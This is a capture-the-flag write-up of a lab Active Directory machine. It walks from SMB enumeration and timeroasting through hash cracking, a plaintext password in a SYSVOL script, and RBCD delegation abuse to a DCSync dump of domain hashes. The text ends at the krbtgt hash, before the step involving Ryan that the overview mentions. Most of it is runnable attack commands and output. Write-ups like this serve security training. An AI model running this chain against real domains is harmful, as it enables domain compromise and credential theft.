Overview
The machine starts by timeroasting machine accounts that cracks appdev01$ to find a sysvol logon script leaking tyler's kerberos credentials, using tyler's genericall over the dc to add a computer account and write rbcd to s4u to administrator. S4u2proxy impersonation enables dcsync to dump ntds and get shell as administrator and powershell history reveals ryan's password to get shell as ryan
Enumeration
Start with nmap scan
┌─[vpn.coursestack.com 10.200.80.207]─[jimmex@attacker]─[~/hacksmarter/past]
└──╼ [★]$ nmap -sC -sV -vv -oA init 10.1.105.35 -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-08-11 19:57 PDT
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:58
Completed NSE at 19:58, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:58
Completed NSE at 19:58, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:58
Completed NSE at 19:58, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 19:58
Completed Parallel DNS resolution of 1 host. at 19:58, 0.10s elapsed
Initiating Connect Scan at 19:58
Scanning 10.1.105.35 [1000 ports]
Discovered open port 445/tcp on 10.1.105.35
Discovered open port 135/tcp on 10.1.105.35
Discovered open port 139/tcp on 10.1.105.35
Discovered open port 53/tcp on 10.1.105.35
Discovered open port 3389/tcp on 10.1.105.35
Discovered open port 636/tcp on 10.1.105.35
Discovered open port 3268/tcp on 10.1.105.35
Discovered open port 88/tcp on 10.1.105.35
Discovered open port 389/tcp on 10.1.105.35
Discovered open port 464/tcp on 10.1.105.35
Discovered open port 3269/tcp on 10.1.105.35
Discovered open port 593/tcp on 10.1.105.35
Completed Connect Scan at 19:58, 11.85s elapsed (1000 total ports)
Initiating Service scan at 19:58
Scanning 12 services on 10.1.105.35
Completed Service scan at 19:58, 31.25s elapsed (12 services on 1 host)
NSE: Script scanning 10.1.105.35.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:58
NSE Timing: About 98.14% done; ETC: 19:59 (0:00:01 remaining)
NSE Timing: About 99.94% done; ETC: 19:59 (0:00:00 remaining)
Completed NSE at 19:59, 61.45s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:59
Completed NSE at 19:59, 4.85s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:59
Completed NSE at 19:59, 0.00s elapsed
Nmap scan report for 10.1.105.35
Host is up, received user-set (0.18s latency).
Scanned at 2026-08-11 19:58:00 PDT for 109s
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Simple DNS Plus
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2026-08-12 02:58:19Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: past.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds syn-ack Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: PAST)
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: past.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack
3389/tcp open ms-wbt-server syn-ack Microsoft Terminal Services
| _ssl-date: 2026-08-12T02:59:46+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=EC2AMAZ-A5O4OL8.past.local
| Issuer: commonName=EC2AMAZ-A5O4OL8.past.local
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-08-11T02:56:09
| Not valid after: 2027-02-10T02:56:09
| MD5: 74db:7b66:349f:bda1:8636:15ca:12dd:78c8
| SHA-1: a010:8fd0:0461:1b0d:7574:6aa4:c110:9f5c:48a0:fb78
| -----BEGIN CERTIFICATE-----
| MIIC+DCCAeCgAwIBAgIQVYnlZK0ozadNNN4ksa3HVjANBgkqhkiG9w0BAQsFADAl
| MSMwIQYDVQQDExpFQzJBTUFaLUE1TzRPTDgucGFzdC5sb2NhbDAeFw0yNjA4MTEw
| MjU2MDlaFw0yNzAyMTAwMjU2MDlaMCUxIzAhBgNVBAMTGkVDMkFNQVotQTVPNE9M
| OC5wYXN0LmxvY2FsMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAsGz+
| YLZpYB0+gXN6j29+sI1RlvTYKOj4Ibk2ZHlD8P5mSP14fAY31yYs/h9XwFaf7QRH
| N9yuC67fZyI43QsROJIZed9w5V8QXMszAmXk+qgzIS8cCk7SATIC2ABiXtFGJRqV
| mqY+EIYh7ew6HKjultHlN+XV/u7er2ZFe2YaUOkoKmkaJAaGyQ9hNw0AUm3mKYOz
| 1u4WvhmqY6IguWgOkrLBzbVBsGsZ4XkCj/OniMKvT1oGq+OtSZLRFmCFDTFWm+mp
| 3msnz+XoLw8IgRbd01+nl/k6TNfvg7AfcbhzfInbXiL4RnLaqW8TRrZmmVq9D2bt
| o4dbOTlQg99xoqSoPQIDAQABoyQwIjATBgNVHSUEDDAKBggrBgEFBQcDATALBgNV
| HQ8EBAMCBDAwDQYJKoZIhvcNAQELBQADggEBABzuROaH9W9IUKJCLGtkuK/N0QuV
| vhamuW2Oz3UwVzXQkwdwywXx5xpBXoyzdVx9CLf2Mg4LGLy6PKabvbp7B4w2F3nJ
| oMkSy4uW1n3JX9Rbq/vGMUtV0ynpMiGkVO3mznyUG52clsHdvGNPfHg5DKHOi1pG
| Z2NTgP/0PrDqyu5DzS7oakQqRRqdpt270SzTWEA9adh/oyrDeRg2rTGT5AUSUDHp
| e0DatDHIyQ0gM6mh8nIIsOG1GF+6IUaQOi6xLCHKmxf9tN0Odic8aMJupo8uTuX4
| D/ycThjFJ5GMvr2uuH1t9wmJumnM6LieIe4cFAvC5Up8Upjx3cBjWNIqpX4=
| _-----END CERTIFICATE-----
Service Info: Host: EC2AMAZ-A5O4OL8; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 43367/tcp): CLEAN (Timeout)
| Check 2 (port 51762/tcp): CLEAN (Timeout)
| Check 3 (port 23708/udp): CLEAN (Timeout)
| Check 4 (port 4035/udp): CLEAN (Timeout)
| _ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 3:1:1:
| _ Message signing enabled and required
| _clock-skew: 0s
| _smb2-time: Protocol negotiation failed (SMB2)
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:59
Completed NSE at 19:59, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:59
Completed NSE at 19:59, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:59
Completed NSE at 19:59, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 109.94 seconds
Looks like full AD environment, there isn't even any kind of web ports
- Domain name is
past.localand FQDN isEC2AMAZ-A5O4OL8.past.local - No skew so it is ready to go
- Nothing else we can get out of this
Setup the environment and now we're ready to go
┌─[vpn.coursestack.com 10.200.80.207]─[jimmex@attacker]─[~/hacksmarter/past]
└──╼ [★]$ echo '10.1.105.35 EC2AMAZ-A5O4OL8 EC2AMAZ-A5O4OL8.past.local past.local' | sudo tee -a /etc/hosts
10.1.105.35 EC2AMAZ-A5O4OL8 EC2AMAZ-A5O4OL8.past.local past.local
┌─[vpn.coursestack.com 10.200.80.207]─[jimmex@attacker]─[~/hacksmarter/past]
└──╼ [★]$ sudo nxc smb past.local -u '' -p '' --generate-krb5-file /etc/krb5.conf
SMB 10.1.105.35 445 EC2AMAZ-A5O4OL8 [*] Windows Server 2016 Datacenter 14393 x64 (name:EC2AMAZ-A5O4OL8) (domain:past.local) (signing:True) (SMBv1:True) (Null Auth:True)
SMB 10.1.105.35 445 EC2AMAZ-A5O4OL8 [+] krb5 conf saved to: /etc/krb5.conf
SMB 10.1.105.35 445 EC2AMAZ-A5O4OL8 [+] Run the following command to use the conf file: export KRB5_CONFIG=/etc/krb5.conf
SMB 10.1.105.35 445 EC2AMAZ-A5O4OL8 [+] past.local\:
Just because I feel like something is missing, I am gonna run a full scan in the background for now
SMB
The guest account gives us access to the share Share
┌─[vpn.coursestack.com 10.200.80.207]─[jimmex@attacker]─[~/hacksmarter/past]
└──╼ [★]$ nxc smb past.local -u 'Guest' -p '' --shares
SMB 10.1.105.35 445 EC2AMAZ-A5O4OL8 [*] Windows Server 2016 Datacenter 14393 x64 (name:EC2AMAZ-A5O4OL8) (domain:past.local) (signing:True) (SMBv1:True) (Null Auth:True)
SMB 10.1.105.35 445 EC2AMAZ-A5O4OL8 [+] past.local\Guest:
SMB 10.1.105.35 445 EC2AMAZ-A5O4OL8 [*] Enumerated shares
SMB 10.1.105.35 445 EC2AMAZ-A5O4OL8 Share Permissions Remark
SMB 10.1.105.35 445 EC2AMAZ-A5O4OL8 ----- ----------- ------
SMB 10.1.105.35 445 EC2AMAZ-A5O4OL8 ADMIN$ Remote Admin
SMB 10.1.105.35 445 EC2AMAZ-A5O4OL8 C$ Default share
SMB 10.1.105.35 445 EC2AMAZ-A5O4OL8 IPC$ READ Remote IPC
SMB 10.1.105.35 445 EC2AMAZ-A5O4OL8 NETLOGON Logon server share
SMB 10.1.105.35 445 EC2AMAZ-A5O4OL8 Share READ
SMB 10.1.105.35 445 EC2AMAZ-A5O4OL8 SYSVOL Logon server share
And it has a single file called AD machines
┌─[vpn.coursestack.com 10.200.80.207]─[jimmex@attacker]─[~/hacksmarter/past]
└──╼ [★]$ smbclient //10.1.105.35/Share -U'Guest'%''
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Jan 23 18:04:17 2026
.. D 0 Fri Jan 23 18:04:17 2026
AD_machines.txt A 270 Fri Jan 23 18:04:17 2026
7863807 blocks of size 4096. 2588831 blocks available
smb: \> get AD_machines.txt
getting file \AD_machines.txt of size 270 as AD_machines.txt (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)
smb: \> exit
There is more than one machine in this domain so let's hope one of those machines is configured as pre2k machine
┌─[vpn.coursestack.com 10.200.80.207]─[jimmex@attacker]─[~/hacksmarter/past]
└──╼ [★]$ cat AD_machines.txt
Name DNSHostName
---- -----------
EC2AMAZ-A5O4OL8 EC2AMAZ-A5O4OL8.past.local
APPDEV01
WEBDEV01
DEV01
And none of them is configured as pre2k so let's move on
┌─[vpn.coursestack.com 10.200.80.207]─[jimmex@attacker]─[~/hacksmarter/past]
└──╼ [★]$ pre2k unauth -dc-ip 10.1.105.35 -d past.local -inputfile machines.txt -verbose
___ __
/'___`\ /\ \
_____ _ __ __ /\_\ /\ \\ \ \/'\
/\ '__`\/\`' __\/'__`\ _______\/_/// /__\ \ , <
\ \ \L\ \ \ \//\ __//\______\ // /_\ \\ \ \\`\
\ \ ,__/\ \_\\ \____\/______/ /\______/ \ \_\ \_\
\ \ \/ \/_/ \/____/ \/_____/ \/_/\/_/
\ \_\ v3.1
\/_/
@unsigned_sh0rt
@Tw1sm
[20:46:17] INFO Testing started at 2026-08-11 20:46:17
[20:46:17] INFO Using 10 threads
[20:46:17] DEBUG Invalid credentials: past.local\APPDEV01$:appdev01
[20:46:17] DEBUG Invalid credentials: past.local\DEV01$:dev01
[20:46:17] DEBUG Invalid credentials: past.local\WEBDEV01$:webdev01
We also have access to the pipe to list users so let's try to find any asrep-roastable users
┌─[vpn.coursestack.com 10.200.80.207]─[jimmex@attacker]─[~/hacksmarter/past]
└──╼ [★]$ nxc smb past.local -u 'Guest' -p '' --rid-brute
SMB 10.1.105.35 445 EC2AMAZ-A5O4OL8 [*] Windows Server 2016 Datacenter 14393 x64 (name:EC2AMAZ-A5O4OL8) (domain:past.local) (signing:True) (SMBv1:True) (Null Auth:True)
SMB 10.1.105.35 445 EC2AMAZ-A5O4OL8 [+] past.local\Guest:
SMB 10.1.105.35 445 EC2AMAZ-A5O4OL8 498: PAST\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.1.105.35 445 EC2AMAZ-A5O4OL8 500: PAST\Administrator (SidTypeUser)
SMB 10.1.105.35 445 EC2AMAZ-A5O4OL8 501: PAST\Guest (SidTypeUser)
SMB 10.1.105.35 445 EC2AMAZ-A5O4OL8 502: PAST\krbtgt (SidTypeUser)
SMB 10.1.105.35 445 EC2AMAZ-A5O4OL8 503: PAST\DefaultAccount (SidTypeUser)
SMB 10.1.105.35 445 EC2AMAZ-A5O4OL8 512: PAST\Domain Admins (SidTypeGroup)
SMB 10.1.105.35 445 EC2AMAZ-A5O4OL8 513: PAST\Domain Users (SidTypeGroup)
SMB 10.1.105.35 445 EC2AMAZ-A5O4OL8 514: PAST\Domain Guests (SidTypeGroup)
SMB 10.1.105.35 445 EC2AMAZ-A5O4OL8 515: PAST\Domain Computers (SidTypeGroup)
SMB 10.1.105.35 445 EC2AMAZ-A5O4OL8 516: PAST\Domain Controllers (SidTypeGroup)
SMB 10.1.105.35 445 EC2AMAZ-A5O4OL8 517: PAST\Cert Publishers (SidTypeAlias)
SMB 10.1.105.35 445 EC2AMAZ-A5O4OL8 518: PAST\Schema Admins (SidTypeGroup)
SMB 10.1.105.35 445 EC2AMAZ-A5O4OL8 519: PAST\Enterprise Admins (SidTypeGroup)
SMB 10.1.105.35 445 EC2AMAZ-A5O4OL8 520: PAST\Group Policy Creator Owners (SidTypeGroup)
SMB 10.1.105.35 445 EC2AMAZ-A5O4OL8 521: PAST\Read-only Domain Controllers (SidTypeGroup)
SMB 10.1.105.35 445 EC2AMAZ-A5O4OL8 522: PAST\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.1.105.35 445 EC2AMAZ-A5O4OL8 525: PAST\Protected Users (SidTypeGroup)
SMB 10.1.105.35 445 EC2AMAZ-A5O4OL8 526: PAST\Key Admins (SidTypeGroup)
SMB 10.1.105.35 445 EC2AMAZ-A5O4OL8 527: PAST\Enterprise Key Admins (SidTypeGroup)
SMB 10.1.105.35 445 EC2AMAZ-A5O4OL8 553: PAST\RAS and IAS Servers (SidTypeAlias)
SMB 10.1.105.35 445 EC2AMAZ-A5O4OL8 571: PAST\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.1.105.35 445 EC2AMAZ-A5O4OL8 572: PAST\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.1.105.35 445 EC2AMAZ-A5O4OL8 1008: PAST\tyler (SidTypeUser)
SMB 10.1.105.35 445 EC2AMAZ-A5O4OL8 1009: PAST\EC2AMAZ-A5O4OL8$ (SidTypeUser)
SMB 10.1.105.35 445 EC2AMAZ-A5O4OL8 1110: PAST\DnsAdmins (SidTypeAlias)
SMB 10.1.105.35 445 EC2AMAZ-A5O4OL8 1111: PAST\DnsUpdateProxy (SidTypeGroup)
SMB 10.1.105.35 445 EC2AMAZ-A5O4OL8 1115: PAST\APPDEV01$ (SidTypeUser)
SMB 10.1.105.35 445 EC2AMAZ-A5O4OL8 1116: PAST\WEBDEV01$ (SidTypeUser)
SMB 10.1.105.35 445 EC2AMAZ-A5O4OL8 1117: PAST\DEV01$ (SidTypeUser)
SMB 10.1.105.35 445 EC2AMAZ-A5O4OL8 1121: PAST\ryan (SidTypeUser)
Access as appdev01$
No as-rep roastable users and we can try the kerberoasting against those accounts but nothing also so last thing we can do from here is the timeroasting
And we got a list of hashes, I am sure that it isn't the main DC host that it is crackable so I will omit it to save time and start with 1115 instead
┌─[vpn.coursestack.com 10.200.80.207]─[jimmex@attacker]─[/opt/scripts/timeroast]
└──╼ [★]$ python3 timeroast.py 10.1.105.35 --rids 1009-1117 | tee timeroast.out
1009:$sntp-ms$1c81862ea681528603b38fd71a36c51a$1c0111e900000000000a0d1f4c4f434cee265f618d401091e1b8428bffbfcd0aee2670af2d3fef03ee2670af2d401747
1115:$sntp-ms$4897044566bb8047f642d31806041dd4$1c0111e900000000000a0d204c4f434cee265f618f561c6ce1b8428bffbfcd0aee2670afcb3d6e1fee2670afcb3d88f7
1116:$sntp-ms$ace2f2e9d5ac4f53e0ffd0903f5a3430$1c0111e900000000000a0d204c4f434cee265f618c986261e1b8428bffbfcd0aee2670afcc985348ee2670afcc986917
1117:$sntp-ms$7327cebc2ad628928c4a662e893ff909$1c0111e900000000000a0d204c4f434cee265f618e6ec834e1b8428bffbfcd0aee2670afce6eb412ee2670afce6eceea
And I got a password for one of the hashes so no need to continue, I guess let's see what we can do with that password
┌─[vpn.coursestack.com 10.200.80.207]─[jimmex@attacker]─[~/hacksmarter/past]
└──╼ [★]$ hashcat -a 0 -m 31300 timeroast.out /usr/share/wordlists/rockyou.txt --username
hashcat (v7.1.2-382-g2d71af371) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================================
* Device #01: cpu-haswell-Intel(R) Core(TM) i7-6700HQ CPU @ 2.60GHz, 2207/4414 MB (1024 MB allocatable), 2MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Minimum salt length supported by kernel: 0
Maximum salt length supported by kernel: 256
Hashes: 3 digests; 3 unique digests, 3 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory allocated for this attack: 512 MB (3605 MB free)
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
$sntp-ms$4897044566bb8047f642d31806041dd4$1c0111e900000000000a0d204c4f434cee265f618f561c6ce1b8428bffbfcd0aee2670afcb3d6e1fee2670afcb3d88f7:P@ssw0rd!
Validating credentials and we are in
┌─[vpn.coursestack.com 10.200.80.207]─[jimmex@attacker]─[~/hacksmarter/past]
└──╼ [★]$ nxc smb past.local -u 'appdev01$' -p 'P@ssw0rd!'
SMB 10.1.105.35 445 EC2AMAZ-A5O4OL8 [*] Windows Server 2016 Datacenter 14393 x64 (name:EC2AMAZ-A5O4OL8) (domain:past.local) (signing:True) (SMBv1:True) (Null Auth:True)
SMB 10.1.105.35 445 EC2AMAZ-A5O4OL8 [+] past.local\appdev01$:P@ssw0rd!
Creds are also valid for ldap so let's collect data for BloodHound
┌─[vpn.coursestack.com 10.200.80.207]─[jimmex@attacker]─[~/hacksmarter/past]
└──╼ [★]$ bloodhound-ce-python -u 'appdev01$' -p 'P@ssw0rd!' -d past.local -ns 10.1.105.35 -c All --zip
INFO: BloodHound.py for BloodHound Community Edition
INFO: Found AD domain: past.local
INFO: Getting TGT for user
INFO: Connecting to LDAP server: ec2amaz-a5o4ol8.past.local
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 4 computers
INFO: Connecting to LDAP server: ec2amaz-a5o4ol8.past.local
INFO: Found 7 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 20 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer: EC2AMAZ-A5O4OL8.past.local
INFO: Done in 00M 31S
INFO: Compressing output into 20260811211841_bloodhound.zip
Nothing was found for this though, no delegation or special groups so let's go back to smb again
Listing the shares again we got access over 2 more shares
┌─[vpn.coursestack.com 10.200.80.207]─[jimmex@attacker]─[~/hacksmarter/past]
└──╼ [★]$ nxc smb past.local -u 'appdev01$' -p 'P@ssw0rd!' --shares
SMB 10.1.105.35 445 EC2AMAZ-A5O4OL8 [*] Windows Server 2016 Datacenter 14393 x64 (name:EC2AMAZ-A5O4OL8) (domain:past.local) (signing:True) (SMBv1:True) (Nul
l Auth:True)
SMB 10.1.105.35 445 EC2AMAZ-A5O4OL8 [+] past.local\appdev01$:P@ssw0rd!
SMB 10.1.105.35 445 EC2AMAZ-A5O4OL8 [*] Enumerated shares
SMB 10.1.105.35 445 EC2AMAZ-A5O4OL8 Share Permissions Remark
SMB 10.1.105.35 445 EC2AMAZ-A5O4OL8 ----- ----------- ------
SMB 10.1.105.35 445 EC2AMAZ-A5O4OL8 ADMIN$ Remote Admin
SMB 10.1.105.35 445 EC2AMAZ-A5O4OL8 C$ Default share
SMB 10.1.105.35 445 EC2AMAZ-A5O4OL8 IPC$ READ Remote IPC
SMB 10.1.105.35 445 EC2AMAZ-A5O4OL8 NETLOGON READ Logon server share
SMB 10.1.105.35 445 EC2AMAZ-A5O4OL8 Share READ
SMB 10.1.105.35 445 EC2AMAZ-A5O4OL8 SYSVOL READ Logon server share
SYSVOL Scripts
Looking for scripts in SYSVOL we find a script with tyler_init name and we already knew that there is a user called tyler so maybe there is creds there
┌─[vpn.coursestack.com 10.200.80.207]─[jimmex@attacker]─[~/hacksmarter/past]
└──╼ [★]$ smbclient //10.1.105.35/SYSVOL -U'appdev01$'%'P@ssw0rd!'
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Jan 23 13:32:56 2026
.. D 0 Fri Jan 23 13:32:56 2026
past.local Dr 0 Fri Jan 23 13:32:56 2026
7863807 blocks of size 4096. 2588473 blocks available
smb: \> cd past.local\
smb: \past.local\> ls
. D 0 Fri Jan 23 13:40:44 2026
.. D 0 Fri Jan 23 13:40:44 2026
DfsrPrivate DHSr 0 Fri Jan 23 13:40:44 2026
Policies D 0 Fri Jan 23 13:33:14 2026
scripts D 0 Fri Jan 23 17:55:55 2026
7863807 blocks of size 4096. 2588473 blocks available
smb: \past.local\> cd scripts\
lsmb: \past.local\scripts\> ls
. D 0 Fri Jan 23 17:55:55 2026
.. D 0 Fri Jan 23 17:55:55 2026
tyler_init.cmd A 238 Fri Jan 23 17:55:55 2026
7863807 blocks of size 4096. 2588473 blocks available
smb: \past.local\scripts\> get tyler_init.cmd
getting file \past.local\scripts\tyler_init.cmd of size 238 as tyler_init.cmd (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)
smb: \past.local\scripts\>
Access as Tyler
And we got password for the user tyler
┌─[vpn.coursestack.com 10.200.80.207]─[jimmex@attacker]─[~/hacksmarter/past]
└──╼ [★]$ cat tyler_init.cmd
@echo off
REM Temporary dev helper - DO NOT REMOVE
REM Tyler auto-login helper
set TYLER_USER=tyler
set TYLER_PASS=5rtfgvb%RTFGVB
REM Fake ?use? of the vars so it looks intentional
echo Initializing dev environment for %TYLER_USER%...
Validating the credentials, the user can only use Kerberos which we already knew from kerbrute downgrade failure
┌─[vpn.coursestack.com 10.200.80.207]─[jimmex@attacker]─[~/hacksmarter/past]
└──╼ [★]$ nxc smb past.local -u tyler -p '5rtfgvb%RTFGVB'
SMB 10.1.105.35 445 EC2AMAZ-A5O4OL8 [*] Windows Server 2016 Datacenter 14393 x64 (name:EC2AMAZ-A5O4OL8) (domain:past.local) (signing:True) (SMBv1:True) (Null Auth:True)
SMB 10.1.105.35 445 EC2AMAZ-A5O4OL8 [-] past.local\tyler:5rtfgvb%RTFGVB STATUS_ACCOUNT_RESTRICTION
┌─[vpn.coursestack.com 10.200.80.207]─[jimmex@attacker]─[~/hacksmarter/past]
└──╼ [★]$ nxc smb past.local -u tyler -p '5rtfgvb%RTFGVB' -k
SMB past.local 445 EC2AMAZ-A5O4OL8 [*] Windows Server 2016 Datacenter 14393 x64 (name:EC2AMAZ-A5O4OL8) (domain:past.local) (signing:True) (SMBv1:True) (Null Auth:True)
SMB past.local 445 EC2AMAZ-A5O4OL8 [+] past.local\tyler:5rtfgvb%RTFGVB
Looking again in BloodHound and we have GenericAll over the DC so let's abuse that

RBCD DC
So first we add a computer account to the domain
┌─[vpn.coursestack.com 10.200.80.207]─[jimmex@attacker]─[~/hacksmarter/past]
└──╼ [★]$ addcomputer.py -dc-ip 10.1.105.35 -dc-host EC2AMAZ-A5O4OL8.past.local -computer-name 'ATK01$' -computer-pass 'Password123!' -k past.local/tyler:'5rtfgvb%RTFGVB'
Impacket v0.14.0.dev0+20260407.172353.7fc084ad - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Successfully added machine account ATK01$ with password Password123!.
Then add RBCD on the DC telling it that the computer account ATK01$ can impersonate whatever user against DC
┌─[vpn.coursestack.com 10.200.80.207]─[jimmex@attacker]─[~/hacksmarter/past]
└──╼ [★]$ rbcd.py -delegate-to 'EC2AMAZ-A5O4OL8$' -delegate-from 'ATK01$' -action write -k -dc-ip 10.1.105.35 -dc-host EC2AMAZ-A5O4OL8.PAST.LOCAL past.local/tyler:'5rtfgvb%RTFGVB'
Impacket v0.14.0.dev0+20260407.172353.7fc084ad - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Accounts allowed to act on behalf of other identity:
[-] SID not found in LDAP: S-1-5-21-1361116239-706371773-96491794-1118
[-] SID not found in LDAP: S-1-5-21-1361116239-706371773-96491794-1119
[-] SID not found in LDAP: S-1-5-21-1361116239-706371773-96491794-1120
[*] Delegation rights modified successfully!
[*] ATK01$ can now impersonate users on EC2AMAZ-A5O4OL8$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[-] SID not found in LDAP: S-1-5-21-1361116239-706371773-96491794-1118
[-] SID not found in LDAP: S-1-5-21-1361116239-706371773-96491794-1119
[-] SID not found in LDAP: S-1-5-21-1361116239-706371773-96491794-1120
[*] ATK01$ (S-1-5-21-1361116239-706371773-96491794-1610)
Now all is left is standard S4U2Self (Getting impersonated ticket as administrator against ATK01$) then S4U2Proxy (asking DC to access it using this administrator account cause we can impersonate against it)
Then dump the entire domain with DCSync
┌─[vpn.coursestack.com 10.200.80.207]─[jimmex@attacker]─[~/hacksmarter/past]
└──╼ [★]$ KRB5CCNAME=Administrator@cifs_EC2AMAZ-A5O4OL8.past.local@PAST.LOCAL.ccache secretsdump.py -k -no-pass past.local/administrator@EC2AMAZ-A5O4OL8.past.local
Impacket v0.14.0.dev0+20260407.172353.7fc084ad - Copyright Fortra, LLC and its affiliated companies
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x57dac43549d5335a785c5d33ad66dd24
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31592a42841d0a9e74f93c41d8884cd0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
PAST\EC2AMAZ-A5O4OL8$:aes256-cts-hmac-sha1-96:2477749a5e4eebf545f9ac0479d033075b68ab7416b89ab475d78f80d3634469
PAST\EC2AMAZ-A5O4OL8$:aes128-cts-hmac-sha1-96:136215f5c3a82991a312a4220af5982f
PAST\EC2AMAZ-A5O4OL8$:des-cbc-md5:0d926ddfa42c5138
PAST\EC2AMAZ-A5O4OL8$:plain_password_hex:49095575070076834e034d2b284bf2a703f85a5453d4b0f6a260086362444827f6e4a0e5095ebb1f8ef537a16218ce2dfc6741b8087c5c4d2f1acfe0c3d9a95445c27cc47fa532c1ba43
5843a662e4b914844ce9cf7523d01f29b0bc0f4299e4d3eb9fbcff293c6832da5b88c9cc2d3a217fccf4d97eb16c5dc0087660bb3197d247769dfb34767faaa567fcba7b050e98e35dcfeb6cd68eac0b65215312b89e33c865bbf79f29abf
ebf2e113f5fe5f6a5266e1e961c60c1a05b2b7cd0f16ad5a368d47319894a1ac93e906f741dce65907c0459f6d12e70f81cdecdc5fb264a8c84133d6a2514637eff5ba5e621033a
PAST\EC2AMAZ-A5O4OL8$:aad3b435b51404eeaad3b435b51404ee:32f2847bbf2e1297ee1b968278b028fe:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0x4788c727bb5ebb6ffeecfffbc42e3dc0bb950bbb
dpapi_userkey:0x7439eb735d5612ad03cb1adf5b0bc31c5211e273
[*] NL$KM
0000 2E 74 ED 55 62 CB 0C 23 83 3D C6 56 51 CE B2 93 .t.Ub..#.=.VQ...
0010 63 BC 5F C9 59 8B 25 DB 1F FC F9 A2 26 50 31 60 c._.Y.%.....&P1`
0020 C4 67 C4 47 3B EA D7 01 86 9B 67 31 70 F9 30 A1 .g.G;.....g1p.0.
0030 49 99 F2 29 6D 19 85 D4 F2 01 BE C0 65 26 19 20 I..)m.......e&.
NL$KM:2e74ed5562cb0c23833dc65651ceb29363bc5fc9598b25db1ffcf9a226503160c467c4473bead701869b673170f930a14999f2296d1985d4f201bec065261920
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31592a42841d0a9e74f93c41d8884cd0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:32f98a0286334443b0602bb33a85b2a1:::
